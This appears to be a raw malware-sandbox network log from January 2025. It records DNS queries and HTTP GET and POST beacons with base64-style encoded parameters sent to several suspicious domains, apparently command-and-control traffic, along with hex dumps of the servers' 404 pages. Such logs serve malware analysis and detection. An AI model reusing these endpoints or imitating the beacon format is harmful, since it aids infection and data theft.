Source: global traffic	HTTP traffic detected: GET /0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.canadavinreport.siteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /t322/?Kdr=RN-HMNoXj6pXm&KBEhCJ=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.yunlekeji.topUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /iuvu/?KBEhCJ=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.logidant.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /36be/?KBEhCJ=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /kf1m/?KBEhCJ=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&Kdr=RN-HMNoXj6pXm HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.izmirescortg.xyz
Source: global traffic	DNS traffic detected: DNS query: www.aballanet.cat
Source: global traffic	DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic	DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic	DNS traffic detected: DNS query: www.yunlekeji.top
Source: global traffic	DNS traffic detected: DNS query: www.logidant.xyz
Source: global traffic	DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic	DNS traffic detected: DNS query: www.zkdamdjj.shop

Source: unknown

HTTP traffic detected: POST /6xrr/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 207Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.aballanet.catOrigin: http://www.aballanet.catReferer: http://www.aballanet.cat/6xrr/User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Data Raw: 4b 42 45 68 43 4a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 68 75 31 5a 58 54 70 51 53 69 58 72 30 44 4f 58 67 33 75 44 6a 6b 45 39 41 68 70 56 55 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: KBEhCJ=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4hu1ZXTpQSiXr0DOXg3uDjkE9AhpVUGum8+aqGY=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:39:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvhWCnu5Ui1mrwC9nhT%2B9XIMY43LpfSSC5GvumEt%2B1w1%2FkQ56DQDs218sZseLGJVQEgeyRJDqmX1zo8tehzWAWXRHvDwEelmVyFIm6dRsWtFWv7RUUHbPDCFFqFpLCaPN%2BP%2F7LTZWA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000da2d9e2442e0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=381&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:40:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:40:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 00:40:14 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Sat, 11 Jan 2025 00:40:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 2024788038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=Yt-M2Dezds0snXOL; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:51 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:51 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Sat, 11 Jan 2025 00:40:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 2024857038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=-UBW-xCVP4Rlj2GZ; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:54 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:54 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
